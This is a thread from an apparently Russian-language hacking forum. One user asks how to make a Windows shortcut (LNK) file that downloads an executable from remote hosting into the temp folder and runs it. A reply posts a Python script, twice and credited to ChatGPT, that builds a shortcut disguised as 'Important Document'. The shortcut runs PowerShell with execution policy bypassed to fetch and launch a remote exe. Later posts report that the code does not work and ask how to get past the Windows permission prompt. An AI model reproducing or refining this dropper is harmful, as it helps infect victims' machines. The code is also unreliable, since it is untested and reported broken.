• XSS.stack #1 – первый литературный журнал от юзеров форума

LNK файл

hk111

HDD-drive
Забанен
Регистрация
07.08.2021
Сообщения
46
Реакции
4
Пожалуйста, обратите внимание, что пользователь заблокирован
Как с помощью lnk скачать exe файл который размещен на хостинге/в облачном хранилище, поместить его в папку temp и выполнить?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
here is a script to create an LNK file that downloads and executes exe
Requirements : Python 2.7.2 , pylnk module
not properly tested , Made by CHATGPT
inspierd by : https://github.com/carnal0wnage/python_lnk_maker
Python:
import pylnk

sample

def create_malicious_lnk(filename):
    # Define the target executable (e.g., Windows Calculator)
    target_exe = "C:\\Windows\\System32\\calc.exe"

    # Define the URL of the remote executable (e.g., a potentially malicious file)
    remote_url = "http://example.com/malicious.exe"

    # Create a shortcut
    link = pylnk.for_file(target_exe)
    link.description = "Important Document"
    link.arguments = "/c powershell -NoProfile -ExecutionPolicy Bypass -Command Invoke-WebRequest '{}' -OutFile 'C:\\Windows\\Temp\\malicious.exe'; Start-Process 'C:\\Windows\\Temp\\malicious.exe'".format(remote_url)

    link.icon = target_exe
    link.save(filename)

create_malicious_lnk("malicious.lnk")
 
here is a script to create an LNK file that downloads and executes exe
Requirements : Python 2.7.2 , pylnk module
not properly tested , Made by CHATGPT
inspierd by : https://github.com/carnal0wnage/python_lnk_maker
Python:
import pylnk

sample

def create_malicious_lnk(filename):
    # Define the target executable (e.g., Windows Calculator)
    target_exe = "C:\\Windows\\System32\\calc.exe"

    # Define the URL of the remote executable (e.g., a potentially malicious file)
    remote_url = "http://example.com/malicious.exe"

    # Create a shortcut
    link = pylnk.for_file(target_exe)
    link.description = "Important Document"
    link.arguments = "/c powershell -NoProfile -ExecutionPolicy Bypass -Command Invoke-WebRequest '{}' -OutFile 'C:\\Windows\\Temp\\malicious.exe'; Start-Process 'C:\\Windows\\Temp\\malicious.exe'".format(remote_url)

    link.icon = target_exe
    link.save(filename)

create_malicious_lnk("malicious.lnk")
Code not working
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Пожалуйста, обратите внимание, что пользователь заблокирован
Пожалуйста, обратите внимание, что пользователь заблокирован
при запуске LNK мы можем обойти окно "разрешить этому приложению вносить изменения на вашем устройстве"? какие аргументы использовать?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх